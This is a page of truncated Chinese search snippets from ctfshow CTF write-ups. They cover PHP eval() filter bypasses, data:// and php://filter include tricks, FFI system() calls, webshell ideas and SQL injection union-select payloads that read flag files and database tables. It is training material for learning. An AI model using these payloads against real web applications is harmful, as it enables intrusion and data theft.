web74:eval() 利用,正则绕过。 web75:eval() 利用,正则绕过,PDO 利用。 web76:eval() 利用,正则绕过,PDO 利用。 web77:eval() 利用,正则绕过,伪协议glob://,FFI 利用。 web78:include() 利用,伪协议php://。 web79:include() 利用,伪协议data://。 web80:include() 利用,一句话木马之 Nginx 日志...
web29-web57: 不严格过滤 web58-web77: 突破disable_function 最后是一些综合题 web29 if(!preg_match("/flag/i", $c)){ eval($c); 1. 2. i:不区分大小写 payload: system("nl fla???"); system("nl fla*"); echo `nl fl''ag.php`;或者c=echo `nl fl“”ag.php`; echo `nl fl\ag...
做完ctfshow web 29 ~ 77、118~124的总结,写的比较简略。 PHP 中简单的 eval 函数执行字符限制绕过 使用通配符 * and ? ?c=system('tac f*'); 使用` 执行命令 ?c=`cp fla?.???1.txt`; 构造一句话木马,利用其它变量传入php执行语句 ?c=eval($_GET[1]);&1=system("cat flag.php"); 利用伪协...
}else{highlight_file(__FILE__); 与web32类似,去掉双引号去可。 Copy ?c=$nice=include$_GET[url]?>&url=data://text/plain,<?php%20system("cat%20flag.php");%20?> web34 与上面33没区别,一样的payload即可。 web35 一样,多过滤个等于号,payload: Copy ?c=include$_GET[url]?>&url=data...
Web29: 简单的命令执行,使用/i模式过滤大小写flag,可以使用通配符绕过过滤。 Web30: 比上一题多过滤system与php,可以使用其他函数来执行命令,具体可以参考PHP中常见的命令执行函数与代码执行函数_-passthru-CSDN博客 注意:system(),passthru()自动输出结果exec(),shell_exec()需要打印(echo/print)结果,...
web76 web77 php7.4,基本上命令执行就告一段落了 提示说php7.4 立马想到FFI FFI,php7.4以上才有 https://www.php.net/manual/zh/ffi.cdef.phphttps://www.php.cn/php-weizijiaocheng-415807.html payload: $ffi = FFI::cdef("int system(const char *command);");//创建一个system对象$a='/readflag...
web73: 同上,扫描出来文件名为flagc.txt,但是可以直接include()包含 web74: 同上,扫描出来文件名为flagx.txt,但是可以直接include()包含 Web75: 过滤include; 法一:uaf strlen()函数被过滤,应该可以重写strlen()函数过滤 法二:用PDO连接数据库进行查询...
web171首先尝试1'--+,发现有返回值;说明直接闭合正确;接着找用来输出的列:1' order by 3--+,发现一共有3行(就1,2,3,4,5慢慢试出来)查看数据库:1' union select 1,2,database()--+得到数据库名为ctfshow_web爆破表名:-1' union select 1,2,group_concat(table_name) FROM information_schema....
web176 解法一 解法二 web177 web 178 解法一 解法二 web179 解法一 解法二 web180-182 ...
web 32过滤了: flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\( 这里考虑:利用文件包含以及伪协议读取?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php这里伪协议的意思是,php://filter(过滤器)/convert.base64-encode(base64编码的过滤器)/resource=flag....